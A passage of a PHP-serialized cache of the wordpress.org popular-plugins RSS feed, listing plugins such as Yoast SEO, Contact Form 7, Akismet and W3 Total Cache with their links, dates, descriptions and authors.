malware.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Yoast SEO\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8321@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:114:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Google Analytics by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2316@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"Track your WordPress site easily with the latest tracking codes and lots added data for search result pages and error pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"132@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"18101@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"753@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Regenerate Thumbnails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/plugins/regenerate-thumbnails/#post-6743\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 23 Aug 2008 14:38:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"6743@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"Allows you to regenerate your thumbnails after changing the thumbnail sizes.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Alex Mills (Viper007Bond)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25254@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Really Simple CAPTCHA\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/plugins/really-simple-captcha/#post-9542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2009 02:17:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"9542@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"Really Simple CAPTCHA is a CAPTCHA module intended to be called from other plugins. It is originally created for my Contact Form 7 plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"NextGEN Gallery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/nextgen-gallery/#post-1169\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Apr 2007 20:08:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"1169@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"The most popular WordPress gallery plugin and one of the most popular plugins of all time with over 13 million downloads.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Alex Rabe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2141@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"W3 Total Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/w3-total-cache/#post-12073\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2009 18:46:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"12073@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Easy Web Performance Optimization (WPO) using caching: browser, page, object, database, minify and content delivery network support.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Frederick Townes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WP-PageNavi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wp-pagenavi/#post-363\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 23:17:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"363@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Adds a more advanced paging navigation interface.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Lester Chan\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"15@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Super Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/wp-super-cache/#post-2572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2007 11:40:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2572@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"A very fast caching engine for WordPress that produces static html files.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Donncha O 